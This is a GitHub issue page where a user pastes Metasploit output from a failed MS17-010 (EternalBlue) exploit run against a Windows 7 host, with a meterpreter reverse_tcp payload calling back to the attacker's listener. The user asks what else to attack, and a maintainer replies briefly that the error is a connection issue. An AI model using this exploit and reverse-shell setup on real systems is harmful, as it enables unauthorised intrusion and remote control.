We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp RHOST => 10.100.128.93 LHOST => 10.100.130.180 PAYLOAD => windows/x64/meterpreter/reverse_tcp [-] Handler failed to bind to 10.100.130.180:4444:- - [] Started reverse TCP handler on 0.0.0.0:4444 [] 10.100.128.93:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.100.128.93:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [] 10.100.128.93:445 - Scanned 1 of 1 hosts (100% complete) [+] 10.100.128.93:445 - The target is vulnerable. [] 10.100.128.93:445 - Connecting to target for exploitation. [+] 10.100.128.93:445 - Connection established for exploitation. [+] 10.100.128.93:445 - Target OS selected valid for OS indicated by SMB reply [] 10.100.128.93:445 - CORE raw buffer dump (38 bytes) [] 10.100.128.93:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [] 10.100.128.93:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [] 10.100.128.93:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.100.128.93:445 - Target arch selected valid for arch indicated by DCE/RPC reply [] 10.100.128.93:445 - Trying exploit with 12 Groom Allocations. [] 10.100.128.93:445 - Sending all but last fragment of exploit packet [-] 10.100.128.93:445 - Errno::ECONNRESET: Connection reset by peer [] Exploit completed, but no session was created.
This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?
The text was updated successfully, but these errors were encountered:
This seems like a peer connection issue, I suggest googling the error, this is not caused by the tool
Sorry, something went wrong.
No branches or pull requests
This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?
The text was updated successfully, but these errors were encountered: